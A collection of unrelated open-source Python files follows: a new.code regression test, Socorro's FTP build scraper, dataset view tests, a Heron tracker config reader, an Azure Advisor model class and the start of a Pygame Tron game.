c = f.func_code
argcount = c.co_argcount
nlocals = c.co_nlocals
stacksize = c.co_stacksize
flags = c.co_flags
codestring = c.co_code
constants = c.co_consts
names = c.co_names
varnames = c.co_varnames
filename = c.co_filename
name = c.co_name
firstlineno = c.co_firstlineno
lnotab = c.co_lnotab
freevars = c.co_freevars
cellvars = c.co_cellvars
d = new.code(argcount, nlocals, stacksize, flags, codestring,
constants, names, varnames, filename, name,
firstlineno, lnotab, freevars, cellvars)
# test backwards-compatibility version with no freevars or cellvars
d = new.code(argcount, nlocals, stacksize, flags, codestring,
constants, names, varnames, filename, name,
firstlineno, lnotab)
try: # this used to trigger a SystemError
d = new.code(-argcount, nlocals, stacksize, flags, codestring,
constants, names, varnames, filename, name,
firstlineno, lnotab)
except ValueError:
pass
else:
raise TestFailed, "negative co_argcount didn't trigger an exception"
try: # this used to trigger a SystemError
d = new.code(argcount, -nlocals, stacksize, flags, codestring,
constants, names, varnames, filename, name,
firstlineno, lnotab)
except ValueError:
pass
else:
raise TestFailed, "negative co_nlocals didn't trigger an exception"
try: # this used to trigger a Py_FatalError!
d = new.code(argcount, nlocals, stacksize, flags, codestring,
constants, (5,), varnames, filename, name,
firstlineno, lnotab)
except TypeError:
pass
else:
raise TestFailed, "non-string co_name didn't trigger an exception"
# new.code used to be a way to mutate a tuple...
class S(str): pass
t = (S("ab"),)
d = new.code(argcount, nlocals, stacksize, flags, codestring,
constants, t, varnames, filename, name,
firstlineno, lnotab)
verify(type(t[0]) is S, "eek, tuple changed under us!")
if verbose:
print d
|
bsmedberg/socorro | refs/heads/master | socorro/cron/jobs/ftpscraper.py | 1 | import re
import urllib2
import lxml.html
import json
import time
from configman import Namespace
from crontabber.base import BaseCronApp
from crontabber.mixins import (
as_backfill_cron_app,
with_postgres_transactions
)
from socorro.lib import buildutil
import os
"""
Socket timeout to prevent FTP from hanging indefinitely
Picked a 2 minute timeout as a generous allowance,
given the entire script takes about that much time to run.
"""
import socket
socket.setdefaulttimeout(60)
#==============================================================================
class RetriedError(IOError):
def __init__(self, attempts, url):
self.attempts = attempts
self.url = url
def __str__(self):
return (
'<%s: %s attempts at downloading %s>' %
(self.__class__.__name__, self.attempts, self.url)
)
def urljoin(*parts):
url = parts[0]
for part in parts[1:]:
if not url.endswith('/'):
url += '/'
if part.startswith('/'):
part = part[1:]
url += part
return url
def patient_urlopen(url, max_attempts=4, sleep_time=20):
attempts = 0
while True:
if attempts >= max_attempts:
raise RetriedError(attempts, url)
try:
attempts += 1
page = urllib2.urlopen(url)
except urllib2.HTTPError, err:
if err.code == 404:
return
if err.code < 500:
raise
time.sleep(sleep_time)
except urllib2.URLError, err:
time.sleep(sleep_time)
else:
content = page.read()
page.close()
return content
def getLinks(url, startswith=None, endswith=None):
html = ''
results = []
content = patient_urlopen(url, sleep_time=30)
if not content:
return []
html = lxml.html.document_fromstring(content)
for element, attribute, link, pos in html.iterlinks():
if startswith:
if link.startswith(startswith):
results.append(link)
elif endswith:
if link.endswith(endswith):
results.append(link)
return results
def parseBuildJsonFile(url, nightly=False):
content = patient_urlopen(url)
if content:
try:
kvpairs = json.loads(content)
kvpairs['repository'] = kvpairs['moz_source_repo']\
.split('/', -1)[-1]
kvpairs['build_type'] = kvpairs['moz_update_channel']
kvpairs['buildID'] = kvpairs['buildid']
return kvpairs
# bug 963431 - it is valid to have an empty file
# due to a quirk in our build system
except ValueError:
pass
def parseInfoFile(url, nightly=False):
content = patient_urlopen(url)
results = {}
bad_lines = []
if not content:
return results, bad_lines
contents = content.splitlines()
if nightly:
results = {'buildID': contents[0], 'rev': contents[1]}
if len(contents) > 2:
results['altrev'] = contents[2]
elif contents:
results = {}
for line in contents:
if line == '':
continue
try:
key, value = line.split('=')
results[key] = value
except ValueError:
bad_lines.append(line)
return results, bad_lines
def parseB2GFile(url, nightly=False, logger=None):
"""
Parse the B2G manifest JSON file
Example: {"buildid": "20130125070201", "update_channel":
"nightly", "version": "18.0"}
TODO handle exception if file does not exist
"""
content = patient_urlopen(url)
if not content:
return
results = json.loads(content)
# bug 869564: Return None if update_channel is 'default'
if results['update_channel'] == 'default' and logger:
logger.warning(
"Found default update_channel for buildid: %s. Skipping.",
results['buildid']
)
return
# Default 'null' channels to nightly
results['build_type'] = results['update_channel'] or 'nightly'
# Default beta_number to 1 for beta releases
if results['update_channel'] == 'beta':
results['beta_number'] = results.get('beta_number', 1)
return results
def getJsonRelease(dirname, url):
candidate_url = urljoin(url, dirname)
version = dirname.split('-candidates')[0]
builds = getLinks(candidate_url, startswith='build')
if not builds:
return
latest_build = builds.pop()
build_url = urljoin(candidate_url, latest_build)
version_build = os.path.basename(os.path.normpath(latest_build))
for platform in ['linux', 'mac', 'win', 'debug']:
platform_urls = getLinks(build_url, startswith=platform)
for p in platform_urls:
platform_url = urljoin(build_url, p)
platform_local_url = urljoin(platform_url, 'en-US/')
json_files = getLinks(platform_local_url, endswith='.json')
for f in json_files:
json_url = urljoin(platform_local_url, f)
kvpairs = parseBuildJsonFile(json_url)
if not kvpairs:
continue
kvpairs['version_build'] = version_build
yield (platform, version, kvpairs)
def getJsonNightly(dirname, url):
nightly_url = urljoin(url, dirname)
json_files = getLinks(nightly_url, endswith='.json')
for f in json_files:
if 'en-US' in f:
pv, platform = re.sub('\.json$', '', f).split('.en-US.')
elif 'multi' in f:
pv, platform = re.sub('\.json$', '', f).split('.multi.')
else:
continue
version = pv.split('-')[-1]
repository = []
for field in dirname.split('-'):
if not field.isdigit():
repository.append(field)
repository = '-'.join(repository).strip('/')
json_url = urljoin(nightly_url, f)
kvpairs = parseBuildJsonFile(json_url, nightly=True)
yield (platform, repository, version, kvpairs)
def getRelease(dirname, url):
candidate_url = urljoin(url, dirname)
builds = getLinks(candidate_url, startswith='build')
if not builds:
#logger.info('No build dirs in %s' % candidate_url)
return
latest_build = builds.pop()
build_url = urljoin(candidate_url, latest_build)
version_build = os.path.basename(os.path.normpath(latest_build))
info_files = getLinks(build_url, endswith='_info.txt')
for f in info_files:
info_url = urljoin(build_url, f)
kvpairs, bad_lines = parseInfoFile(info_url)
platform = f.split('_info.txt')[0]
version = dirname.split('-candidates')[0]
kvpairs['version_build'] = version_build
yield (platform, version, kvpairs, bad_lines)
def getNightly(dirname, url):
nightly_url = urljoin(url, dirname)
info_files = getLinks(nightly_url, endswith='.txt')
for f in info_files:
if 'en-US' in f:
pv, platform = re.sub('\.txt$', '', f).split('.en-US.')
elif 'multi' in f:
pv, platform = re.sub('\.txt$', '', f).split('.multi.')
else:
##return
continue
version = pv.split('-')[-1]
repository = []
for field in dirname.split('-'):
if not field.isdigit():
repository.append(field)
repository = '-'.join(repository).strip('/')
info_url = urljoin(nightly_url, f)
kvpairs, bad_lines = parseInfoFile(info_url, nightly=True)
yield (platform, repository, version, kvpairs, bad_lines)
def getB2G(dirname, url, backfill_date=None, logger=None):
"""
Last mile of B2G scraping, calls parseB2G on .json
Files look like: socorro_unagi-stable_2013-01-25-07.json
"""
url = '%s/%s' % (url, dirname)
info_files = getLinks(url, endswith='.json')
platform = None
version = None
repository = 'b2g-release'
for f in info_files:
# Pull platform out of the filename
jsonfilename = os.path.splitext(f)[0].split('_')
# Skip if this file isn't for socorro!
if jsonfilename[0] != 'socorro':
continue
platform = jsonfilename[1]
info_url = '%s/%s' % (url, f)
kvpairs = parseB2GFile(info_url, nightly=True, logger=logger)
# parseB2GFile() returns None when a file is
# unable to be parsed or we ignore the file
if kvpairs is None:
continue
version = kvpairs['version']
yield (platform, repository, version, kvpairs)
#==============================================================================
@with_postgres_transactions()
@as_backfill_cron_app
class FTPScraperCronApp(BaseCronApp):
app_name = 'ftpscraper'
app_description = 'FTP Scraper'
app_version = '0.1'
required_config = Namespace()
required_config.add_option(
'products',
default='firefox,mobile,thunderbird,seamonkey,b2g',
from_string_converter=lambda line: tuple(
[x.strip() for x in line.split(',') if x.strip()]
),
doc='a comma-delimited list of URIs for each product')
required_config.add_option(
'base_url',
default='http://ftp.mozilla.org/pub/mozilla.org',
doc='The base url to use for fetching builds')
required_config.add_option(
'dry_run',
default=False,
doc='Print instead of storing builds')
def run(self, date):
# record_associations
logger = self.config.logger
for product_name in self.config.products:
logger.debug('scraping %s releases for date %s',
product_name, date)
if product_name == 'b2g':
self.database_transaction_executor(
self.scrapeB2G,
product_name,
date
)
elif product_name == 'firefox':
self.database_transaction_executor(
self._scrape_json_releases_and_nightlies,
product_name,
date
)
else:
self.database_transaction_executor(
self._scrape_releases_and_nightlies,
product_name,
date
)
def _scrape_releases_and_nightlies(self, connection, product_name, date):
self.scrapeReleases(connection, product_name)
self.scrapeNightlies(connection, product_name, date)
def _scrape_json_releases_and_nightlies(
self,
connection,
product_name,
date
):
self.scrapeJsonReleases(connection, product_name)
self.scrapeJsonNightlies(connection, product_name, date)
def _insert_build(self, cursor, *args, **kwargs):
if self.config.dry_run:
print "INSERT BUILD"
for arg in args:
print "\t", repr(arg)
for key in kwargs:
print "\t%s=" % key, repr(kwargs[key])
else:
buildutil.insert_build(cursor, *args, **kwargs)
def _is_final_beta(self, version):
# If this is a XX.0 version in the release channel,
# return True otherwise, False
return version.endswith('.0')
def scrapeJsonReleases(self, connection, product_name):
prod_url = urljoin(self.config.base_url, product_name, '')
logger = self.config.logger
cursor = connection.cursor()
for directory in ('nightly', 'candidates'):
if not getLinks(prod_url, startswith=directory):
logger.debug('Dir %s not found for %s',
directory, product_name)
continue
url = urljoin(self.config.base_url, product_name, directory, '')
releases = getLinks(url, endswith='-candidates/')
for release in releases:
for info in getJsonRelease(release, url):
platform, version, kvpairs = info
build_type = 'release'
beta_number = None
repository = kvpairs['repository']
if 'b' in version:
build_type = 'beta'
version, beta_number = version.split('b')
if kvpairs.get('buildID'):
build_id = kvpairs['buildID']
version_build = kvpairs['version_build']
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
beta_number,
repository,
version_build,
ignore_duplicates=True
)
if (self._is_final_beta(version)
and build_type == 'release'
and version > '26.0'):
logger.debug('is final beta version %s', version)
repository = 'mozilla-beta'
build_id = kvpairs['buildID']
build_type = 'beta'
version_build = kvpairs['version_build']
# just force this to 99 until
# we deal with version_build properly
beta_number = 99
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
beta_number,
repository,
version_build,
ignore_duplicates=True
)
def scrapeJsonNightlies(self, connection, product_name, date):
nightly_url = urljoin(self.config.base_url, product_name, 'nightly',
date.strftime('%Y'),
date.strftime('%m'),
'')
cursor = connection.cursor()
dir_prefix = date.strftime('%Y-%m-%d')
nightlies = getLinks(nightly_url, startswith=dir_prefix)
for nightly in nightlies:
for info in getJsonNightly(nightly, nightly_url):
platform, repository, version, kvpairs = info
build_type = 'nightly'
if version.endswith('a2'):
build_type = 'aurora'
if kvpairs.get('buildID'):
build_id = kvpairs['buildID']
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
kvpairs.get('beta_number', None),
repository,
ignore_duplicates=True
)
def scrapeReleases(self, connection, product_name):
prod_url = urljoin(self.config.base_url, product_name, '')
# releases are sometimes in nightly, sometimes in candidates dir.
# look in both.
logger = self.config.logger
cursor = connection.cursor()
for directory in ('nightly', 'candidates'):
if not getLinks(prod_url, startswith=directory):
logger.debug('Dir %s not found for %s',
directory, product_name)
continue
url = urljoin(self.config.base_url, product_name, directory, '')
releases = getLinks(url, endswith='-candidates/')
for release in releases:
for info in getRelease(release, url):
platform, version, kvpairs, bad_lines = info
if kvpairs.get('buildID') is None:
self.config.logger.warning(
"BuildID not found for %s on %s",
release, url
)
continue
build_type = 'Release'
beta_number = None
repository = 'mozilla-release'
if 'b' in version:
build_type = 'Beta'
version, beta_number = version.split('b')
repository = 'mozilla-beta'
for bad_line in bad_lines:
self.config.logger.warning(
"Bad line for %s on %s (%r)",
release, url, bad_line
)
# Put a build into the database
build_id = kvpairs['buildID']
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
beta_number,
repository,
ignore_duplicates=True
)
# If we've got a final beta, add a second record
if self._is_final_beta(version):
repository = 'mozilla-beta'
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
beta_number,
repository,
ignore_duplicates=True
)
def scrapeNightlies(self, connection, product_name, date):
nightly_url = urljoin(self.config.base_url, product_name, 'nightly',
date.strftime('%Y'),
date.strftime('%m'),
'')
cursor = connection.cursor()
dir_prefix = date.strftime('%Y-%m-%d')
nightlies = getLinks(nightly_url, startswith=dir_prefix)
for nightly in nightlies:
for info in getNightly(nightly, nightly_url):
platform, repository, version, kvpairs, bad_lines = info
for bad_line in bad_lines:
self.config.logger.warning(
"Bad line for %s (%r)",
nightly, bad_line
)
build_type = 'Nightly'
if version.endswith('a2'):
build_type = 'Aurora'
if kvpairs.get('buildID'):
build_id = kvpairs['buildID']
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
kvpairs.get('beta_number', None),
repository,
ignore_duplicates=True
)
def scrapeB2G(self, connection, product_name, date):
if not product_name == 'b2g':
return
cursor = connection.cursor()
b2g_manifests = urljoin(
self.config.base_url,
product_name,
'manifests',
'nightly'
)
dir_prefix = date.strftime('%Y-%m-%d')
version_dirs = getLinks(b2g_manifests, startswith='1.')
for version_dir in version_dirs:
prod_url = urljoin(
b2g_manifests,
version_dir,
date.strftime('%Y'),
date.strftime('%m')
)
nightlies = getLinks(prod_url, startswith=dir_prefix)
for nightly in nightlies:
b2gs = getB2G(
nightly,
prod_url,
backfill_date=None,
logger=self.config.logger
)
for info in b2gs:
(platform, repository, version, kvpairs) = info
build_id = kvpairs['buildid']
build_type = kvpairs['build_type']
self._insert_build(
cursor,
product_name,
version,
platform,
build_id,
build_type,
kvpairs.get('beta_number', None),
repository,
ignore_duplicates=True
)
import datetime
import sys
from socorro.app.generic_app import main
class _MockConnection(object): # pragma: no cover
"""When running the FTPScraperCronAppRunner app, it never actually
needs a database connection because instead of doing an insert
it just prints. However, it primes the connection by getting a cursor
out first (otherwise it'd have to do it every time in a loo[).
"""
def cursor(self):
pass
class FTPScraperCronAppRunner(FTPScraperCronApp): # pragma: no cover
required_config = Namespace()
required_config.add_option(
'date',
default=datetime.datetime.utcnow(),
doc='Date to run for',
from_string_converter='socorro.lib.datetimeutil.string_to_datetime'
)
def __init__(self, config):
self.config = config
self.config.dry_run = True
def main(self):
assert self.config.dry_run
self.run(_MockConnection(), self.config.date)
if __name__ == '__main__': # pragma: no cover
sys.exit(main(FTPScraperCronAppRunner))
|
Fireblend/chromium-crosswalk | refs/heads/master | build/android/pylib/results/__init__.py | 1201 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
|
winnerineast/Origae-6 | refs/heads/master | origae/dataset/generic/test_views.py | 1 | # Copyright (c) 2016-2017, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import json
import os
import tempfile
import unittest
from bs4 import BeautifulSoup
import numpy as np
import PIL.Image
import origae.test_views
from origae import extensions
from origae import test_utils
from origae.utils import constants
# May be too short on a slow system
TIMEOUT_DATASET = 45
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(origae.test_views.BaseViewsTest):
"""
Provides some functions
"""
@classmethod
def dataset_exists(cls, job_id):
return cls.job_exists(job_id, 'datasets')
@classmethod
def dataset_status(cls, job_id):
return cls.job_status(job_id, 'datasets')
@classmethod
def abort_dataset(cls, job_id):
return cls.abort_job(job_id, job_type='datasets')
@classmethod
def dataset_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'datasets'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_DATASET
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_dataset(cls, job_id):
return cls.delete_job(job_id, job_type='datasets')
class BaseViewsTestWithDataset(BaseViewsTest):
"""
Provides some functions
"""
IMAGE_WIDTH = 32
IMAGE_HEIGHT = 32
CHANNELS = 1
@classmethod
def create_dataset(cls, **kwargs):
"""
Create a dataset
Returns the job_id
Raises RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
data = {
'dataset_name': 'test_dataset',
'group_name': 'test_group',
}
data.update(kwargs)
request_json = data.pop('json', False)
url = '/datasets/generic/create/%s' % cls.EXTENSION_ID
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
raise RuntimeError(
'Dataset creation failed with %s' % rv.status_code)
return json.loads(rv.data)['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
s = BeautifulSoup(rv.data, 'html.parser')
div = s.select('div.alert-danger')
if div:
print div[0]
else:
print rv.data
raise RuntimeError(
'Failed to create dataset - status %s' % rv.status_code)
job_id = cls.job_id_from_response(rv)
assert cls.dataset_exists(job_id), 'dataset not found after successful creation'
cls.created_datasets.append(job_id)
return job_id
@classmethod
def get_dataset_json(cls):
rv = cls.app.get('/datasets/%s.json' % cls.dataset_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
return json.loads(rv.data)
@classmethod
def get_entry_count(cls, stage):
json_data = cls.get_dataset_json()
for t in json_data['create_db_tasks']:
if t['stage'] == stage:
return t['entry_count']
return None
@classmethod
def get_feature_dims(cls):
json_data = cls.get_dataset_json()
return json_data['feature_dims']
@classmethod
def create_random_imageset(cls, **kwargs):
"""
Create a folder of random grayscale images
"""
num_images = kwargs.pop('num_images', 10)
image_width = kwargs.pop('image_width', 32)
image_height = kwargs.pop('image_height', 32)
if not hasattr(cls, 'imageset_folder'):
# create a temporary folder
cls.imageset_folder = tempfile.mkdtemp()
for i in xrange(num_images):
x = np.random.randint(
low=0,
high=256,
size=(image_height, image_width))
x = x.astype('uint8')
pil_img = PIL.Image.fromarray(x)
filename = os.path.join(
cls.imageset_folder,
'%d.png' % i)
pil_img.save(filename)
if not hasattr(cls, 'test_image'):
cls.test_image = filename
@classmethod
def create_variable_size_random_imageset(cls, **kwargs):
"""
Create a folder of random grayscale images
Image size varies randomly
"""
num_images = kwargs.pop('num_images', 10)
if not hasattr(cls, 'imageset_folder'):
# create a temporary folder
cls.imageset_folder = tempfile.mkdtemp()
for i in xrange(num_images):
image_width = np.random.randint(low=8, high=32)
image_height = np.random.randint(low=8, high=32)
x = np.random.randint(
low=0,
high=256,
size=(image_height, image_width))
x = x.astype('uint8')
pil_img = PIL.Image.fromarray(x)
filename = os.path.join(
cls.imageset_folder,
'%d.png' % i)
pil_img.save(filename)
if not hasattr(cls, 'test_image'):
cls.test_image = filename
@classmethod
def setUpClass(cls, **kwargs):
if extensions.data.get_extension(cls.EXTENSION_ID) is None:
raise unittest.SkipTest('Extension "%s" is not installed' % cls.EXTENSION_ID)
super(BaseViewsTestWithDataset, cls).setUpClass()
cls.dataset_id = cls.create_dataset(json=True, **kwargs)
assert cls.dataset_wait_completion(cls.dataset_id) == 'Done', 'create failed'
# Save val DB path
json = cls.get_dataset_json()
for t in json['create_db_tasks']:
if t['stage'] == constants.VAL_DB:
if t['feature_db_path'] is not None:
cls.val_db_path = os.path.join(
json['directory'],
t['feature_db_path'])
else:
cls.val_db_path = None
class GenericViewsTest(BaseViewsTest):
@classmethod
def setUpClass(cls, **kwargs):
if extensions.data.get_extension(cls.EXTENSION_ID) is None:
raise unittest.SkipTest('Extension "%s" is not installed' % cls.EXTENSION_ID)
super(GenericViewsTest, cls).setUpClass()
def test_page_dataset_new(self):
rv = self.app.get('/datasets/generic/new/%s' % self.EXTENSION_ID)
print rv.data
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert extensions.data.get_extension(self.EXTENSION_ID).get_title() in rv.data, 'unexpected page format'
def test_nonexistent_dataset(self):
assert not self.dataset_exists('foo'), "dataset shouldn't exist"
class GenericCreationTest(BaseViewsTestWithDataset):
"""
Dataset creation tests
"""
def test_create_json(self):
job_id = self.create_dataset(json=True)
self.abort_dataset(job_id)
def test_create_delete(self):
job_id = self.create_dataset()
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_abort_delete(self):
job_id = self.create_dataset()
assert self.abort_dataset(job_id) == 200, 'abort failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_wait_delete(self):
job_id = self.create_dataset()
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_invalid_number_of_reader_threads(self):
try:
self.create_dataset(
json=True,
dsopts_num_threads=0)
assert False
except RuntimeError:
# job is expected to fail with a RuntimeError
pass
def test_no_force_same_shape(self):
job_id = self.create_dataset(force_same_shape=0)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
def test_clone(self):
options_1 = {
'resize_channels': '1',
}
job1_id = self.create_dataset(**options_1)
assert self.dataset_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/datasets/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content1 = json.loads(rv.data)
# Clone job1 as job2
options_2 = {
'clone': job1_id,
}
job2_id = self.create_dataset(**options_2)
assert self.dataset_wait_completion(job2_id) == 'Done', 'second job failed'
rv = self.app.get('/datasets/%s.json' % job2_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content2 = json.loads(rv.data)
# These will be different
content1.pop('id')
content2.pop('id')
content1.pop('directory')
content2.pop('directory')
assert (content1 == content2), 'job content does not match'
job1 = origae.webapp.scheduler.get_job(job1_id)
job2 = origae.webapp.scheduler.get_job(job2_id)
assert (job1.form_data == job2.form_data), 'form content does not match'
class GenericCreatedTest(BaseViewsTestWithDataset):
"""
Tests on a dataset that has already been created
"""
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for d in content['datasets']:
if d['id'] == self.dataset_id:
found = True
break
assert found, 'dataset not found in list'
def test_dataset_json(self):
content = self.get_dataset_json()
assert content['id'] == self.dataset_id, 'expected same job_id: %s != %s' % (content['id'], self.dataset_id)
def test_edit_name(self):
status = self.edit_job(
self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
rv = self.app.get('/datasets/summary?job_id=%s' % self.dataset_id)
assert rv.status_code == 200
assert 'new name' in rv.data
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_explore_features(self):
# features DB is encoded by default
rv = self.app.get('/datasets/generic/explore?db=train_db%%2Ffeatures&job_id=%s' % self.dataset_id)
# just make sure this doesn't return an error
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
def test_feature_dims(self):
dims = self.get_feature_dims()
assert dims == [self.IMAGE_HEIGHT, self.IMAGE_WIDTH, self.CHANNELS]
################################################################################
# Test classes
################################################################################
class TestImageGradientViews(GenericViewsTest, test_utils.DatasetMixin):
"""
Tests which don't require an imageset or a dataset
"""
EXTENSION_ID = "image-gradients"
class TestImageGradientCreation(GenericCreationTest, test_utils.DatasetMixin):
"""
Test that create datasets
"""
EXTENSION_ID = "image-gradients"
@classmethod
def setUpClass(cls, **kwargs):
super(TestImageGradientCreation, cls).setUpClass(
train_image_count=100,
val_image_count=20,
test_image_count=10,
image_width=cls.IMAGE_WIDTH,
image_height=cls.IMAGE_HEIGHT,
)
def test_entry_counts(self):
assert self.get_entry_count(constants.TRAIN_DB) == 100
assert self.get_entry_count(constants.VAL_DB) == 20
assert self.get_entry_count(constants.TEST_DB) == 10
class TestImageGradientCreated(GenericCreatedTest, test_utils.DatasetMixin):
"""
Test that create datasets
"""
EXTENSION_ID = "image-gradients"
IMAGE_WIDTH = 8
IMAGE_HEIGHT = 24
@classmethod
def setUpClass(cls, **kwargs):
super(TestImageGradientCreated, cls).setUpClass(
image_width=cls.IMAGE_WIDTH,
image_height=cls.IMAGE_HEIGHT)
class TestImageProcessingCreated(GenericCreatedTest, test_utils.DatasetMixin):
"""
Test Image processing extension
"""
EXTENSION_ID = "image-processing"
NUM_IMAGES = 100
FOLDER_PCT_VAL = 10
@classmethod
def setUpClass(cls, **kwargs):
cls.create_random_imageset(
num_images=cls.NUM_IMAGES,
image_width=cls.IMAGE_WIDTH,
image_height=cls.IMAGE_HEIGHT)
super(TestImageProcessingCreated, cls).setUpClass(
feature_folder=cls.imageset_folder,
label_folder=cls.imageset_folder,
folder_pct_val=cls.FOLDER_PCT_VAL,
channel_conversion='L')
def test_entry_counts(self):
assert self.get_entry_count(constants.TRAIN_DB) == self.NUM_IMAGES * (1. - self.FOLDER_PCT_VAL / 100.)
assert self.get_entry_count(constants.VAL_DB) == self.NUM_IMAGES * (self.FOLDER_PCT_VAL / 100.)
class TestImageProcessingCreatedWithSeparateValidationDirs(GenericCreatedTest, test_utils.DatasetMixin):
"""
Test Image processing extension, using separate fields for the train and validation folders
Use RGB channel conversion for this test
"""
EXTENSION_ID = "image-processing"
NUM_IMAGES = 100
CHANNELS = 3
IMAGE_HEIGHT = 16
IMAGE_WIDTH = 64
@classmethod
def setUpClass(cls, **kwargs):
cls.create_random_imageset(
num_images=cls.NUM_IMAGES,
image_width=cls.IMAGE_WIDTH,
image_height=cls.IMAGE_HEIGHT)
super(TestImageProcessingCreatedWithSeparateValidationDirs, cls).setUpClass(
feature_folder=cls.imageset_folder,
label_folder=cls.imageset_folder,
has_val_folder='y',
validation_feature_folder=cls.imageset_folder,
validation_label_folder=cls.imageset_folder,
channel_conversion='RGB')
def test_entry_counts(self):
assert self.get_entry_count(constants.TRAIN_DB) == self.NUM_IMAGES
assert self.get_entry_count(constants.VAL_DB) == self.NUM_IMAGES
|
wangli1426/heron | refs/heads/master | heron/tools/tracker/src/python/config.py | 9 | # Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' config.py '''
import os
import yaml
from heron.statemgrs.src.python.config import Config as StateMgrConfig
STATEMGRS_KEY = "statemgrs"
VIZ_URL_FORMAT_KEY = "viz.url.format"
class Config(object):
"""
Responsible for reading the yaml config file and
exposing various tracker configs.
"""
def __init__(self, conf_file):
self.configs = None
self.statemgr_config = StateMgrConfig()
self.viz_url_format = None
self.parse_config_file(conf_file)
def parse_config_file(self, conf_file):
"""parse config files"""
expanded_conf_file_path = os.path.expanduser(conf_file)
assert os.path.lexists(expanded_conf_file_path), "Config file does not exists: %s" % (conf_file)
# Read the configuration file
with open(expanded_conf_file_path, 'r') as f:
self.configs = yaml.load(f)
self.load_configs()
def load_configs(self):
"""load config files"""
self.statemgr_config.set_state_locations(self.configs[STATEMGRS_KEY])
if VIZ_URL_FORMAT_KEY in self.configs:
self.viz_url_format = self.validated_viz_url_format(self.configs[VIZ_URL_FORMAT_KEY])
else:
self.viz_url_format = ""
# pylint: disable=no-self-use
def validated_viz_url_format(self, viz_url_format):
"""validate visualization url format"""
# We try to create a string by substituting all known
# parameters. If an unknown parameter is present, an error
# will be thrown
valid_parameters = {
"${CLUSTER}": "cluster",
"${ENVIRON}": "environ",
"${TOPOLOGY}": "topology",
"${ROLE}": "role",
"${USER}": "user",
}
dummy_formatted_viz_url = viz_url_format
for key, value in valid_parameters.iteritems():
dummy_formatted_viz_url = dummy_formatted_viz_url.replace(key, value)
# All $ signs must have been replaced
if '$' in dummy_formatted_viz_url:
raise Exception("Invalid viz.url.format: %s" % (viz_url_format))
# No error is thrown, so the format is valid.
return viz_url_format
def get_formatted_viz_url(self, execution_state):
"""
@param execution_state: The python dict representing JSON execution_state
@return Formatted viz url
"""
# Create the parameters based on execution state
valid_parameters = {
"${CLUSTER}": execution_state["cluster"],
"${ENVIRON}": execution_state["environ"],
"${TOPOLOGY}": execution_state["jobname"],
"${ROLE}": execution_state["role"],
"${USER}": execution_state["submission_user"],
}
formatted_viz_url = self.viz_url_format
for key, value in valid_parameters.iteritems():
formatted_viz_url = formatted_viz_url.replace(key, value)
return formatted_viz_url
|
AutorestCI/azure-sdk-for-python | refs/heads/master | azure-mgmt-advisor/azure/mgmt/advisor/models/config_data.py | 2 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConfigData(Model):
"""The Advisor configuration data structure.
:param id: The resource Id of the configuration resource.
:type id: str
:param type: The type of the configuration resource.
:type type: str
:param name: The name of the configuration resource.
:type name: str
:param properties: The list of property name/value pairs.
:type properties: ~azure.mgmt.advisor.models.ConfigDataProperties
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'ConfigDataProperties'},
}
def __init__(self, id=None, type=None, name=None, properties=None):
super(ConfigData, self).__init__()
self.id = id
self.type = type
self.name = name
self.properties = properties
|
THEMVFFINMAN/PyttleShip | refs/heads/master | PYTRON/main.py | 2 | import copy
import math
import pygame
import random
import sys
pygame.init()
# Initializing some colors for cleaner looks throughout
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 80, 0)
RED = (255, 0, 0)
LIGHTBLUE = (0, 255, 255)
# I've tried to program this in it's entirety based
